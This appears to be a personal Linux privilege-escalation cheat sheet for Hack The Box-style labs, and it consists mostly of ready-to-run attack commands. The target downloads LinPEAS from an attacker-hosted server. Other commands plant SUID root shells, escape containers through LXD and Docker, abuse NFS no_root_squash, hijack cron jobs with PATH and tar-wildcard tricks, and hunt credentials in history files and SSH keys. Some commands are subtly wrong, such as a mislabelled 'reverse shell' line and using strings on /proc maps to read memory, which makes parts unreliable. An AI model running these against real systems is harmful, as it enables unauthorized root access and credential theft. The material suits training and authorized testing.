Linux Privilege Escalation (Linux Privesc)

Linpeas

LinPEAS (Linux Privilege Escalation Awesome Script) is an automated enumeration script that searches for possible privilege escalation vectors on a Linux/Unix target. It is renowned for its comprehensive checks and easy-to-read, color-coded output, which helps to quickly identify misconfigurations.

It checks for a vast range of potential vulnerabilities, including:

  • Kernel version and vulnerabilities.
  • SUID/GUID files.
  • Writable files and directories.
  • Running processes and services.
  • Scheduled tasks (cron jobs).
  • Stored credentials and SSH keys.
  • Network configuration and open ports.

How to Use

On attacker machine with python

#Download the script
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

#Start the http server
sudo python3 -m http.server 8001

Method 02: Rust

# First, install the crate
cargo install simple-http-server

# Then run the server
simple-http-server . --port <attacker-port>

On target machine

#Download and save the script
wget http://<attacker-ip>:<attacker-port>/linpeas.sh -O /tmp/linpeas.sh
#make sure it can run
chmod +x /tmp/linpeas.sh
#run the script
/tmp/linpeas.sh

Command to get root shell

1. Script

cp /bin/bash /tmp/nika; chown root:root /tmp/nika; chmod 4777 /tmp/nika


#Write inside a file that will be executed
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/nika\nchown root:root /tmp/nika\nchmod 4777 /tmp/nika' > script.sh

To get a root shell, execute: /tmp/nika -p

2. If the first doesn't work

cp /bin/bash /tmp/nika; chmod 4777 /tmp/nika
  • Explanation:
    • cp /bin/bash /tmp/nika: Copies the /bin/bash binary to /tmp/nika.
    • chown root:root /tmp/nika: Sets the owner and group of the new binary to root.
    • chmod 4777 /tmp/nika: Sets the SUID bit (4), allowing the binary to always execute with the owner's privileges (root), in addition to granting full read, write, and execute permissions (777) to all users.

To get a root shell, execute: /tmp/nika -p

Initial Enumeration & Scripts

Process Monitoring (pspy)

A non-intrusive tool that lets you monitor processes in real-time without root permissions, useful for spotting cron jobs or other automated tasks as they execute.

./pspy64 -pf -i 1000

Security Auditing (Lynis)

A security auditing tool that performs an in-depth health scan of the system, often revealing hardening weaknesses or misconfigurations that can be exploited.

./lynis audit system

System & User Information

Check OS and Kernel Version

Identifies the operating system and kernel version, which is crucial for finding known public exploits (e.g., Dirty Pipe, Dirty Cow).

uname -a
cat /etc/lsb-release

Check Sudo Permissions

Lists the commands the current user can run as root (or another user) using sudo. The entry (ALL : ALL) ALL or a binary that can be abused (like find, nmap, etc.) is a common vector.

sudo -l

List Running Services

Shows network connections and listening services. Look for services running as root on localhost (127.0.0.1) that might be misconfigured or vulnerable.

netstat -ant

List Processes

Examine running processes. Look for unusual processes, scripts, or applications running as root that might have weak permissions or vulnerabilities.

#See all processes, filtering for root
ps aux | grep root

#See all processes with user info
ps au

Check Command History

The user's command history can contain passwords, API keys, or information about the system's configuration.

history

List SSH Keys

Checks for SSH keys for the current user. A private key (id_rsa) might allow you to log in as another user on the same or a different machine.

ls -l ~/.ssh

Check Environment PATH

Inspects the $PATH variable. If a directory you can write to is listed (especially at the beginning), you may be able to perform a PATH hijacking attack.

echo $PATH

File System & Permissions

Find SUID/SGID Binaries

Searches for files with the SUID or SGID bit set. These files run with the permissions of the file owner (e.g., root), not the user running them, and are a primary target for exploitation.

#Find SUID binaries owned by root
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; 2>/dev/null

#Find SGID binaries owned by root
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
  • find /: Searches the entire filesystem, starting from the root directory (/).
  • -user root: Restricts the search to files owned by the root user.
  • -perm -6000: Searches for files where specific permission bits are set. The - before the mode means it matches if at least these bits are set.
  • 4000 (SUID - Set User ID): The executable runs with the permissions of the file owner. For example, passwd uses this to allow a standard user to modify the shadow file, which is owned by root.
  • 2000 (SGID - Set Group ID): The executable runs with the permissions of the file's group. If set on a directory, new files created within it inherit the directory's group.
  • 6000: This value (4000 + 2000) specifically looks for files that have both the SUID and SGID bits set.
  • -exec ls -ldb {} \;: For each file found, it executes the ls -ldb command to display its detailed information.
  • {} is a placeholder for the found file path.
  • \; terminates the -exec command.
  • 2>/dev/null: Redirects all standard error output (stderr) to /dev/null, suppressing "Permission denied" errors for directories the current user cannot read.
  • -type f: Ensures the search is limited to files, ignoring directories.
  • \( -perm -4000 -o -perm -2000 \): Finds files with either SUID (-4000) or (-o) SGID (-2000) permissions. This will yield a broader and more useful list of potential targets.

Find Binaries with Capabilities

Finds binaries with special capabilities granted, which can often be abused to gain higher privileges (e.g., cap_sys_admin).

getcap -r / 2>/dev/null

Find Writable Files & Directories

Locates files and directories that are "world-writable" (writable by any user). Writing to a script, configuration file, or library in a sensitive location can lead to code execution as another user.

#Find world-writable directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null

#Find world-writable files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

Find Configuration Files

Searches the file system for files with "config" in their name. These often contain credentials or sensitive settings.

find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

Specific Exploits & Techniques

Shared Library Preloading (LD_PRELOAD)

If you can control the LD_PRELOAD environment variable for a process running as root (often via sudo), you can force it to load a malicious shared object (.so file) and execute your code.

sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

LXD Container Escape

If a user belongs to the lxd group, they can escalate privileges to root on the host by creating a privileged container, mounting the host's root filesystem inside it, and accessing that filesystem. This blog has a good PoC about the exploitation.

# On target machine: verify existing LXC images
lxc list
uname -m # check the arch from the target

# On attacker machine: build Alpine LXC image
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine -a <arch>
ls -la  # note the generated .tar.gz filename
python3 -m http.server <attacker-port> # start a http server

# On target machine: download the Alpine image
wget http://<attacker-ip>:<attacker-port>/<alpine-file-name>.tar.gz -O /tmp/image.tar.gz

# On target machine: import and configure the privileged container
lxc image import /tmp/image.tar.gz --alias alpine
lxc init alpine ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

# On target machine: start the container and get root shell
lxc start ignite
lxc exec ignite /bin/sh

Once inside the container, the host's root filesystem is mounted at /mnt/root, providing full access to the host system with root privileges.

Kernel Exploit Compilation

If you find a vulnerable kernel version, you'll often need to transfer an exploit written in C to the target and compile it using gcc.

gcc kernel_exploit.c -o kernel_exploit

Exploiting Services & Applications

Docker Socket Abuse

If your user is in the docker group, they have de facto root access. You can run a privileged container and mount the host's root filesystem (/) to gain full control of the host machine.

#Run an alpine container, mount the host's root directory to /mnt, and chroot into it
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Insecure NFS Shares

Check the Network File System (NFS) exports. If a share is configured with no_root_squash, it means any files created by a root user on a client machine will be owned by root on the server. You can exploit this by creating a SUID binary on the share from your client machine.

#On your attacker machine, check for shares
showmount -e <TARGET_IP>

#Mount the insecure share (e.g., /tmp)
sudo mount -t nfs <TARGET_IP>:/tmp /mnt/nfs

#Create and compile a simple C shell, then set the SUID bit
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /mnt/nfs/shell.c
gcc /mnt/nfs/shell.c -o /mnt/nfs/shell
chmod 4755 /mnt/nfs/shell

#Now, execute ./shell from the /tmp directory on the victim machine to get a root shell.

Abusing Scheduled Tasks

Crontab PATH Hijacking

Cron jobs run with a limited default PATH, often just /usr/bin:/bin. If a cron script executes a command without specifying its full path, and you can write to a directory in cron's PATH, you can create a malicious script with the same name as the command to gain code execution.

#Assume a cron job runs 'backup.sh' which calls 'tar'
#First, check the cron PATH (if possible) or assume it's /usr/bin:/bin
#Create a malicious 'tar' script in a writable directory like /tmp
echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/nika\nchown root:root /tmp/nika\nchmod 4777 /tmp/nika' > /tmp/tar
chmod +x /tmp/tar

#Then, modify the PATH for the cron job's execution context if you can
#(This is more common when you can write to the script itself or related profiles)
#Or if a writable directory like /home/user/bin is in the secure_path for sudo or cron

Note: This attack depends heavily on the cron job's specific configuration and writable paths.

Crontab Wildcard Injection

If a cron job run by root uses a command with a wildcard (*) on a directory you can write to (e.g., tar -cf /backups/archive.tgz /home/user/*), you can create filenames that are interpreted as command-line options.

#In the directory targeted by the wildcard (e.g., /home/user/)
#Create a reverse shell script
echo "/bin/bash /tmp/nika; chown root:root /tmp/nika; chmod 4777 /tmp/nika" > shell.sh

#Create filenames that exploit tar's checkpoint options to execute your script
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Credential & Information Hunting

Search for Credentials in Memory

Examine the memory of processes your user has access to. You might find credentials, API keys, or other sensitive data loaded into memory.

#Strings on a process's memory map (replace PID with target process ID)
strings /proc/<PID>/maps

Exploit Shell History Files

In addition to .bash_history, check for other history files like .zsh_history, .python_history, or application-specific logs that might contain plaintext credentials.

ls -la ~/.*_history
cat ~/.zsh_history

Tags

linux-privesc

Notes

Some of this writeup is revised by AI. My own writing can be a bit clunky, so I get it to review certain parts to make things flow better and be a bit easier to read.

If you liked this content, please give me a respect on my Hack The Box profile. I'd be happy to hear I've helped you.

If anything here isn't clear, check out the cookbook. If you can't find the answer or need further clarification, please contact me at my e-mail.

Last updated: 2025-11-04